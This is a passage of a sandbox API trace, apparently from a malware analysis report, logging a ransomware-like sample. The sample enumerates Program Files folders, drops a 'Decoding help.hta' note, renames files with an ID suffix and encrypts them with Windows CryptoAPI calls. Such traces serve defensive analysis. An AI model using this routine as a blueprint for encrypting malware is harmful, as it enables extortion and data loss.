ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.216] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.216] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.216] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10", cAlternateFileName="")) returned 1 [0040.216] lstrcmpW (lpString1=".", lpString2="10") returned -1 [0040.216] lstrcmpW (lpString1="..", lpString2="10") returned -1 [0040.216] lstrcmpiW (lpString1="windows", lpString2="10") returned 1 [0040.217] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*.*" [0040.217] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*.*") returned 61 [0040.217] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\", lpString2="10" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10" [0040.217] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*" [0040.217] GlobalMemoryStatus (in: lpBuffer=0xc08fd10 | out: lpBuffer=0xc08fd10) [0040.217] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x95389a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x23c [0040.217] CloseHandle (hObject=0x23c) returned 1 [0040.218] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10", cAlternateFileName="")) returned 0 [0040.218] FindClose (in: hFindFile=0x5a5830 | out: hFindFile=0x5a5830) returned 1 Thread: id = 137 os_tid = 0x8b0 [0040.218] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\CrashReports\\*.*", lpFindFileData=0xc1cfd30 | out: lpFindFileData=0xc1cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6c82ea80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6c82ea80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5830 [0040.219] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.219] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xc1cfd30 | out: lpFindFileData=0xc1cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6c82ea80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6c82ea80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.219] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.219] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.219] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xc1cfd30 | out: lpFindFileData=0xc1cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6c82ea80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6c82ea80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0040.219] FindClose (in: hFindFile=0x5a5830 | out: hFindFile=0x5a5830) returned 1 Thread: id = 138 os_tid = 0x8ac [0040.220] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*.*", lpFindFileData=0xc30fd30 | out: lpFindFileData=0xc30fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5830 [0040.220] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.220] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xc30fd30 | out: lpFindFileData=0xc30fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.220] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.220] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.220] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xc30fd30 | out: lpFindFileData=0xc30fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80471418, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf22307c6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22307c6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="install.ins", cAlternateFileName="")) returned 1 [0040.221] lstrcpyW (in: lpString1=0x10cfea08, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*.*" [0040.221] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*.*") returned 49 [0040.221] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\Decoding help.hta" [0040.221] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\signup\\decoding help.hta")) returned 0xffffffff [0040.221] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\signup\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0041.096] WriteFile (in: hFile=0x308, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xc30fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xc30fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.097] CloseHandle (hObject=0x308) returned 1 [0041.098] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.098] lstrcmpiW (lpString1="Decoding help.hta", lpString2="install.ins") returned -1 [0041.098] lstrlenW (lpString="install.ins") returned 11 [0041.098] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*.*" [0041.098] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*.*") returned 49 [0041.098] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\", lpString2="install.ins" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" [0041.098] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" [0041.098] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.[ID]g9uZrLhJaygpwRm1[ID]" [0041.099] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.110] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0041.110] CreateFileMappingA (hFile=0x308, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1ec [0041.110] CryptAcquireContextA (in: phProv=0xc30fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xc30fcec*=0x3449028) returned 1 [0043.483] CryptGenKey (in: hProv=0x3449028, Algid=0x6610, dwFlags=0x1, phKey=0xc30fce8 | out: phKey=0xc30fce8*=0x5a56f0) returned 1 [0043.483] CryptExportKey (in: hKey=0x5a56f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xc30fbe4, pdwDataLen=0xc30fce4 | out: pbData=0xc30fbe4*, pdwDataLen=0xc30fce4*=0x2c) returned 1 [0043.483] MapViewOfFile (hFileMappingObject=0x1ec, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1c0) returned 0x4410000 [0043.486] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc30fbe4*, pdwDataLen=0xc30fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xc30fbe4*, pdwDataLen=0xc30fcf8*=0x100) returned 1 [0043.486] CryptEncrypt (in: hKey=0x5a56f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000*, pdwDataLen=0xc30fce4*=0x1c0, dwBufLen=0x1c0 | out: pbData=0x4410000*, pdwDataLen=0xc30fce4*=0x1c0) returned 1 [0043.486] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0043.487] CloseHandle (hObject=0x1ec) returned 1 [0043.487] CryptDestroyKey (hKey=0x5a56f0) returned 1 [0043.487] CryptReleaseContext (hProv=0x3449028, dwFlags=0x0) returned 1 [0043.487] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.488] WriteFile (in: hFile=0x308, lpBuffer=0xc30fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xc30fcf8, lpOverlapped=0x0 | out: lpBuffer=0xc30fbe4*, lpNumberOfBytesWritten=0xc30fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.488] WriteFile (in: hFile=0x308, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xc30fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xc30fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.489] CloseHandle (hObject=0x308) returned 1 [0043.489] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.490] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xc30fd30 | out: lpFindFileData=0xc30fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80471418, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf22307c6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22307c6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="install.ins", cAlternateFileName="")) returned 0 [0043.490] FindClose (in: hFindFile=0x5a5830 | out: hFindFile=0x5a5830) returned 1 Thread: id = 139 os_tid = 0x8a8 [0040.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*", lpFindFileData=0xc44fd30 | out: lpFindFileData=0xc44fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9c11cf80, ftLastAccessTime.dwHighDateTime=0x1d301bd, ftLastWriteTime.dwLowDateTime=0x9c11cf80, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a6070 [0041.463] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.463] FindNextFileW (in: hFindFile=0x5a6070, lpFindFileData=0xc44fd30 | out: lpFindFileData=0xc44fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9c11cf80, ftLastAccessTime.dwHighDateTime=0x1d301bd, ftLastWriteTime.dwLowDateTime=0x9c11cf80, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.463] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.463] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.463] FindNextFileW (in: hFindFile=0x5a6070, lpFindFileData=0xc44fd30 | out: lpFindFileData=0xc44fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ado", cAlternateFileName="")) returned 1 [0041.463] lstrcmpW (lpString1=".", lpString2="ado") returned -1 [0041.463] lstrcmpW (lpString1="..", lpString2="ado") returned -1 [0041.463] lstrcmpiW (lpString1="windows", lpString2="ado") returned 1 [0041.463] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" [0041.463] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned 50 [0041.463] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\", lpString2="ado" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado" [0041.464] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0041.464] GlobalMemoryStatus (in: lpBuffer=0xc44fd10 | out: lpBuffer=0xc44fd10) [0041.464] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x34283f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0041.464] CloseHandle (hObject=0x2f0) returned 1 [0041.464] FindNextFileW (in: hFindFile=0x5a6070, lpFindFileData=0xc44fd30 | out: lpFindFileData=0xc44fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x886e43c6, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x886e43c6, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x89202410, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0041.464] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" [0041.464] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned 50 [0041.464] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Decoding help.hta" [0041.465] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\decoding help.hta")) returned 0xffffffff [0041.465] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0041.469] WriteFile (in: hFile=0x2f0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xc44fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xc44fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.470] CloseHandle (hObject=0x2f0) returned 1 [0041.470] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.470] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DirectDB.dll") returned -1 [0041.470] lstrlenW (lpString="DirectDB.dll") returned 12 [0041.470] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" [0041.470] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned 50 [0041.470] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\", lpString2="DirectDB.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll" [0041.470] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll" [0041.470] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0041.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll" (normalized: "c:\\program files (x86)\\common files\\system\\directdb.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\directdb.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.471] FindNextFileW (in: hFindFile=0x5a6070, lpFindFileData=0xc44fd30 | out: lpFindFileData=0xc44fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0041.471] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0041.471] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0041.471] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0041.472] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" [0041.472] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned 50 [0041.472] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US" [0041.472] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\*.*" [0041.472] GlobalMemoryStatus (in: lpBuffer=0xc44fd10 | out: lpBuffer=0xc44fd10) [0041.472] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93e83f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0041.473] CloseHandle (hObject=0x2f0) returned 1 [0041.473] FindNextFileW (in: hFindFile=0x5a6070, lpFindFileData=0xc44fd30 | out: lpFindFileData=0xc44fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadc", cAlternateFileName="")) returned 1 [0041.473] lstrcmpW (lpString1=".", lpString2="msadc") returned -1 [0041.473] lstrcmpW (lpString1="..", lpString2="msadc") returned -1 [0041.473] lstrcmpiW (lpString1="windows", lpString2="msadc") returned 1 [0041.473] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" [0041.473] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned 50 [0041.473] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\", lpString2="msadc" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc" [0041.473] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\*.*" [0041.473] GlobalMemoryStatus (in: lpBuffer=0xc44fd10 | out: lpBuffer=0xc44fd10) [0041.473] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9310048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0041.474] CloseHandle (hObject=0x2f0) returned 1 [0041.474] FindNextFileW (in: hFindFile=0x5a6070, lpFindFileData=0xc44fd30 | out: lpFindFileData=0xc44fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f34af90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f34af90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0041.474] lstrcmpW (lpString1=".", lpString2="Ole DB") returned -1 [0041.474] lstrcmpW (lpString1="..", lpString2="Ole DB") returned -1 [0041.474] lstrcmpiW (lpString1="windows", lpString2="Ole DB") returned 1 [0041.474] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" 